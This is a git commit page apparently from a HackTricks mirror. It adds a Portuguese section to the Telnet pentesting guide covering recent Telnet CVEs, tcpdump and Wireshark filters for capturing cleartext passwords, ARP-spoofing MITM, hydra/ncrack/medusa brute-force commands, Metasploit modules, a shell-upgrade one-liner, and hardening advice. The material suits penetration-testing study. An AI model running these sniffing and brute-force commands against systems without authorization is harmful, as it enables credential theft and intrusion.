maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-telnet.md'] to p

Browse Source
This commit is contained in:
Translator 2025-07-13 21:31:11 +00:00
parent d8c3effe41
commit 3fcda3fc71
1 changed files with 57 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

58
src/network-services-pentesting/pentesting-telnet.md
View File

@ -67,4 +67,60 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'
```
{{#include ../banners/hacktricks-training.md}}
### Vulnerabilidades Recentes (2022-2025)
* **CVE-2024-45698 Roteadores D-Link Wi-Fi 6 (DIR-X4860)**: O serviço Telnet embutido aceitava credenciais codificadas e falhou em sanitizar a entrada, permitindo RCE remota não autenticada como root via comandos manipulados na porta 23. Corrigido no firmware ≥ 1.04B05.
* **CVE-2023-40478 NETGEAR RAX30**: Um estouro de buffer baseado em pilha no comando `passwd` da CLI Telnet permite que um atacante adjacente contorne a autenticação e execute código arbitrário como root.
* **CVE-2022-39028 GNU inetutils telnetd**: Uma sequência de dois bytes (`0xff 0xf7` / `0xff 0xf8`) aciona uma desreferência de ponteiro NULL que pode travar o `telnetd`, resultando em um DoS persistente após várias falhas.
Mantenha esses CVEs em mente durante a triagem de vulnerabilidades—se o alvo estiver executando um firmware não corrigido ou um daemon Telnet inetutils legado, você pode ter um caminho direto para execução de código ou um DoS disruptivo.
### Capturando Credenciais & Man-in-the-Middle
Telnet transmite tudo, incluindo credenciais, em **texto claro**. Duas maneiras rápidas de capturá-las:
```bash
# Live capture with tcpdump (print ASCII)
sudo tcpdump -i eth0 -A 'tcp port 23 and not src host $(hostname -I | cut -d" " -f1)'
# Wireshark display filter
tcp.port == 23 && (telnet.data || telnet.option)
```
Para MITM ativo, combine o ARP spoofing (por exemplo, `arpspoof`/`ettercap`) com os mesmos filtros de sniffing para coletar senhas em redes comutadas.
### Força bruta automatizada / Pulverização de senhas
```bash
# Hydra (stop at first valid login)
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>
# Ncrack (drop to interactive session on success)
ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP>
# Medusa (parallel hosts)
medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f
```
A maioria das botnets IoT (variantes do Mirai) ainda escaneia a porta 23 com pequenos dicionários de credenciais padrão—refletir essa lógica pode identificar rapidamente dispositivos fracos.
### Exploração & Pós-Exploração
O Metasploit possui vários módulos úteis:
* `auxiliary/scanner/telnet/telnet_version` enumeração de banner e opções.
* `auxiliary/scanner/telnet/brute_telnet` bruteforce multithreaded.
* `auxiliary/scanner/telnet/telnet_encrypt_overflow` RCE contra Telnet vulnerável do Solaris 9/10 (manipulação da opção ENCRYPT).
* `exploit/linux/mips/netgear_telnetenable` habilita o serviço telnet com um pacote elaborado em muitos roteadores NETGEAR.
Depois que um shell é obtido, lembre-se de que **TTYs geralmente são simples**; faça upgrade com `python -c 'import pty;pty.spawn("/bin/bash")'` ou use os [truques TTY do HackTricks](/generic-hacking/reverse-shells/full-ttys.md).
### Fortalecimento & Detecção (canto da equipe azul)
1. Prefira SSH e desative completamente o serviço Telnet.
2. Se o Telnet for necessário, vincule-o apenas a VLANs de gerenciamento, aplique ACLs e envolva o daemon com TCP wrappers (`/etc/hosts.allow`).
3. Substitua implementações legadas de `telnetd` por `ssl-telnet` ou `telnetd-ssl` para adicionar criptografia de transporte, mas **isso apenas protege dados em trânsito—adivinhação de senhas continua trivial**.
4. Monitore o tráfego de saída para a porta 23; compromissos frequentemente geram shells reversos via Telnet para contornar filtros de saída HTTP rigorosos.
## Referências
* D-Link Advisory CVE-2024-45698 RCE crítica do Telnet.
* NVD CVE-2022-39028 inetutils `telnetd` DoS.
{{#include /banners/hacktricks-training.md}}